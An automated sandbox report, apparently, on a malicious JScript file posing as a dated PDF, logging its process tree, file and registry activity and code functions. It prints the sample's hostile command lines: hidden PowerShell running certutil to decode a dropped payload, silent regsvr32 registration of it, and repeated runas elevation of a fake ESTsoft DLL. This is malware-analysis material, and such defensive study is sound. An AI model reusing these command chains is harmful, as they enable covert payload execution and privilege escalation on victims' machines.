Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe	Process created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe 'C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe' --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=BC6E485E39BA42C7D01E94B3E9769F20 --lang=en-US --disable-pack-loading --lang=en-US --log-file='C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log' --log-severity=disable --product-version='ReaderServices/19.8.20080 Chrome/64.0.3282.119' --enable-pinch --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=BC6E485E39BA42C7D01E94B3E9769F20 --renderer-client-id=4 --mojo-platform-channel-handle=1848 --allow-no-sandbox-job /prefetch:1
Source: C:\Windows\System32\regsvr32.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe start-process regsvr32.exe -argumentlist '/s C:\ProgramData\Software\ESTsoft\Common\ESTCommon.dll' -verb runas
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\System32\regsvr32.exe 'C:\Windows\system32\regsvr32.exe' /s 'C:\ProgramData\Software\ESTsoft\Common\ESTCommon.dll'
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe	Process created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe 'C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe' --type=gpu-process --disable-pack-loading --lang=en-US --log-file='C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log' --log-severity=disable --product-version='ReaderServices/19.8.20080 Chrome/64.0.3282.119' --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x8086 --gpu-device-id=0xbeef --gpu-driver-vendor='Google Inc.' --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file='C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log' --log-severity=disable --product-version='ReaderServices/19.8.20080 Chrome/64.0.3282.119' --service-request-channel-token=747A9B4378C4A9B7BB34D82AEF8DC480 --mojo-platform-channel-handle=2004 --allow-no-sandbox-job --ignored=' --type=renderer ' /prefetch:2
Source: C:\Windows\System32\regsvr32.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe start-process regsvr32.exe -argumentlist '/s C:\ProgramData\Software\ESTsoft\Common\ESTCommon.dll' -verb runas
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\System32\regsvr32.exe 'C:\Windows\system32\regsvr32.exe' /s 'C:\ProgramData\Software\ESTsoft\Common\ESTCommon.dll'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\regsvr32.exe 'C:\Windows\system32\regsvr32.exe' /s C:\ProgramData\Software\ESTsoft\Common\ESTCommon.dll
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe	Process created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe 'C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe' --type=gpu-process --disable-pack-loading --lang=en-US --log-file='C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log' --log-severity=disable --product-version='ReaderServices/19.8.20080 Chrome/64.0.3282.119' --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x8086 --gpu-device-id=0xbeef --gpu-driver-vendor='Google Inc.' --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file='C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log' --log-severity=disable --product-version='ReaderServices/19.8.20080 Chrome/64.0.3282.119' --service-request-channel-token=4DDA8CE3F3D37EB15CD09F11D5C7C42B --mojo-platform-channel-handle=2004 --allow-no-sandbox-job --ignored=' --type=renderer ' /prefetch:2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\regsvr32.exe 'C:\Windows\system32\regsvr32.exe' /s C:\ProgramData\Software\ESTsoft\Common\ESTCommon.dll
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe	Process created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe 'C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe' --type=gpu-process --disable-pack-loading --lang=en-US --log-file='C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log' --log-severity=disable --product-version='ReaderServices/19.8.20080 Chrome/64.0.3282.119' --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x8086 --gpu-device-id=0xbeef --gpu-driver-vendor='Google Inc.' --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file='C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log' --log-severity=disable --product-version='ReaderServices/19.8.20080 Chrome/64.0.3282.119' --service-request-channel-token=29BE366D42ABBCFC024ED1AE01B6F680 --mojo-platform-channel-handle=1828 --allow-no-sandbox-job --ignored=' --type=renderer ' /prefetch:2
Source: C:\Windows\System32\wscript.exe	Process created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe 'C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe' 'C:\ProgramData\ 2021-05-07.pdf'	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -windowstyle hidden certutil -decode C:\Windows\..\ProgramData\efVo8cq.sIhn C:\Windows\..\ProgramData\glK7UwV.pR9a	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -windowstyle hidden regsvr32.exe /s C:\Windows\..\ProgramData\glK7UwV.pR9a	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe 'C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe' --type=renderer /prefetch:1 'C:\ProgramData\ 2021-05-07.pdf'	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe 'C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe' --backgroundcolor=16514043	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\certutil.exe 'C:\Windows\system32\certutil.exe' -decode C:\Windows\..\ProgramData\efVo8cq.sIhn C:\Windows\..\ProgramData\glK7UwV.pR9a	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe	Process created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe 'C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe' --type=gpu-process --disable-pack-loading --lang=en-US --log-file='C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log' --log-severity=disable --product-version='ReaderServices/19.8.20080 Chrome/64.0.3282.119' --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x8086 --gpu-device-id=0xbeef --gpu-driver-vendor='Google Inc.' --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file='C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log' --log-severity=disable --product-version='ReaderServices/19.8.20080 Chrome/64.0.3282.119' --service-request-channel-token=83FD662E69ECF919D8944D885F919F9E --mojo-platform-channel-handle=1612 --allow-no-sandbox-job --ignored=' --type=renderer ' /prefetch:2	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe	Process created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe 'C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe' --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=78C7EE079D4F1A6B9C0BFB5504293DE7 --lang=en-US --disable-pack-loading --lang=en-US --log-file='C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log' --log-severity=disable --product-version='ReaderServices/19.8.20080 Chrome/64.0.3282.119' --enable-pinch --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=78C7EE079D4F1A6B9C0BFB5504293DE7 --renderer-client-id=2 --mojo-platform-channel-handle=1620 --allow-no-sandbox-job /prefetch:1	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe	Process created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe 'C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe' --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=BC6E485E39BA42C7D01E94B3E9769F20 --lang=en-US --disable-pack-loading --lang=en-US --log-file='C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log' --log-severity=disable --product-version='ReaderServices/19.8.20080 Chrome/64.0.3282.119' --enable-pinch --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=BC6E485E39BA42C7D01E94B3E9769F20 --renderer-client-id=4 --mojo-platform-channel-handle=1848 --allow-no-sandbox-job /prefetch:1	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe	Process created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe 'C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe' --type=gpu-process --disable-pack-loading --lang=en-US --log-file='C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log' --log-severity=disable --product-version='ReaderServices/19.8.20080 Chrome/64.0.3282.119' --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x8086 --gpu-device-id=0xbeef --gpu-driver-vendor='Google Inc.' --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file='C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log' --log-severity=disable --product-version='ReaderServices/19.8.20080 Chrome/64.0.3282.119' --service-request-channel-token=747A9B4378C4A9B7BB34D82AEF8DC480 --mojo-platform-channel-handle=2004 --allow-no-sandbox-job --ignored=' --type=renderer ' /prefetch:2	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe	Process created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe 'C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe' --type=gpu-process --disable-pack-loading --lang=en-US --log-file='C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log' --log-severity=disable --product-version='ReaderServices/19.8.20080 Chrome/64.0.3282.119' --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x8086 --gpu-device-id=0xbeef --gpu-driver-vendor='Google Inc.' --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file='C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log' --log-severity=disable --product-version='ReaderServices/19.8.20080 Chrome/64.0.3282.119' --service-request-channel-token=4DDA8CE3F3D37EB15CD09F11D5C7C42B --mojo-platform-channel-handle=2004 --allow-no-sandbox-job --ignored=' --type=renderer ' /prefetch:2	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe	Process created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe 'C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe' --type=gpu-process --disable-pack-loading --lang=en-US --log-file='C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log' --log-severity=disable --product-version='ReaderServices/19.8.20080 Chrome/64.0.3282.119' --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x8086 --gpu-device-id=0xbeef --gpu-driver-vendor='Google Inc.' --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file='C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log' --log-severity=disable --product-version='ReaderServices/19.8.20080 Chrome/64.0.3282.119' --service-request-channel-token=29BE366D42ABBCFC024ED1AE01B6F680 --mojo-platform-channel-handle=1828 --allow-no-sandbox-job --ignored=' --type=renderer ' /prefetch:2	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\regsvr32.exe 'C:\Windows\system32\regsvr32.exe' /s C:\Windows\..\ProgramData\glK7UwV.pR9a	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c C:\ProgramData\temp\C011.tmp.bat	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c C:\ProgramData\temp\C5CF.tmp.bat	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Process created: C:\Windows\System32\regsvr32.exe regsvr32.exe /s 'C:\ProgramData\Software\ESTsoft\Common\ESTCommon.dll'	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe start-process regsvr32.exe -argumentlist '/s C:\ProgramData\Software\ESTsoft\Common\ESTCommon.dll' -verb runas	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe start-process regsvr32.exe -argumentlist '/s C:\ProgramData\Software\ESTsoft\Common\ESTCommon.dll' -verb runas

Source: C:\Windows\System32\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{f414c262-6ac0-11cf-b6d1-00aa00bbbb58}\InprocServer32

Jump to behavior

Source: C:\Windows\System32\regsvr32.exe	Code function: 13_2_00007FF983D929A0 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,GetLastError,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,		13_2_00007FF983D929A0
Source: C:\Windows\System32\regsvr32.exe	Code function: 19_2_00007FF983D029A0 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,GetLastError,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,		19_2_00007FF983D029A0

Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe

File created: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\AdobeFnt16.lst.5476

Jump to behavior

Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe

File created: C:\Users\user\AppData\Local\Temp\acrord32_sbx\A9R6liubn_q4g208_484.tmp

Jump to behavior

Source: classification engine

Classification label: mal100.troj.evad.winJSE@49/82@1/1

Source: C:\Windows\System32\wscript.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\b818384f6f636b55ba6f5af0c6a7784d\mscorlib.ni.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\b818384f6f636b55ba6f5af0c6a7784d\mscorlib.ni.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\b818384f6f636b55ba6f5af0c6a7784d\mscorlib.ni.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\b818384f6f636b55ba6f5af0c6a7784d\mscorlib.ni.dll

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5336:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5360:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5732:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5460:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4152:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2228:120:WilError_01

Source: C:\Windows\System32\regsvr32.exe

Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c C:\ProgramData\temp\C011.tmp.bat

Source: C:\Windows\System32\regsvr32.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\regsvr32.exe	File read: C:\Windows\System32\drivers\etc\hosts

Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe

File opened: C:\Windows\SysWOW64\Msftedit.dll

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Source: x110bx116cx1100x116dx1107x116e x1100x1161x1111x1161x11ab 2021-05-07.pdf.jse

Static file information: File size 28634023 > 1048576

Data Obfuscation:

Suspicious powershell command line found

Show sources

Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -windowstyle hidden certutil -decode C:\Windows\..\ProgramData\efVo8cq.sIhn C:\Windows\..\ProgramData\glK7UwV.pR9a
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -windowstyle hidden regsvr32.exe /s C:\Windows\..\ProgramData\glK7UwV.pR9a
Source: C:\Windows\System32\regsvr32.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe start-process regsvr32.exe -argumentlist '/s C:\ProgramData\Software\ESTsoft\Common\ESTCommon.dll' -verb runas
Source: C:\Windows\System32\regsvr32.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe start-process regsvr32.exe -argumentlist '/s C:\ProgramData\Software\ESTsoft\Common\ESTCommon.dll' -verb runas
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -windowstyle hidden certutil -decode C:\Windows\..\ProgramData\efVo8cq.sIhn C:\Windows\..\ProgramData\glK7UwV.pR9a	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -windowstyle hidden regsvr32.exe /s C:\Windows\..\ProgramData\glK7UwV.pR9a	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe start-process regsvr32.exe -argumentlist '/s C:\ProgramData\Software\ESTsoft\Common\ESTCommon.dll' -verb runas	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe start-process regsvr32.exe -argumentlist '/s C:\ProgramData\Software\ESTsoft\Common\ESTCommon.dll' -verb runas

Source: C:\Windows\System32\regsvr32.exe	Code function: 13_2_00007FF983DE3358 push rax; retf	13_2_00007FF983DE3359
Source: C:\Windows\System32\regsvr32.exe	Code function: 13_2_00007FF983DE3318 push rax; retf	13_2_00007FF983DE3359
Source: C:\Windows\System32\regsvr32.exe	Code function: 13_2_00007FF983DCDFD4 push rax; ret	13_2_00007FF983DCDFD5
Source: C:\Windows\System32\regsvr32.exe	Code function: 19_2_00007FF983D53358 push rax; retf	19_2_00007FF983D53359
Source: C:\Windows\System32\regsvr32.exe	Code function: 19_2_00007FF983D53318 push rax; retf	19_2_00007FF983D53359
Source: C:\Windows\System32\regsvr32.exe	Code function: 19_2_00007FF983D3DFD4 push rax; ret	19_2_00007FF983D3DFD5

Source: C:\Windows\System32\regsvr32.exe

Code function: 13_2_00007FF983DABCCF LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,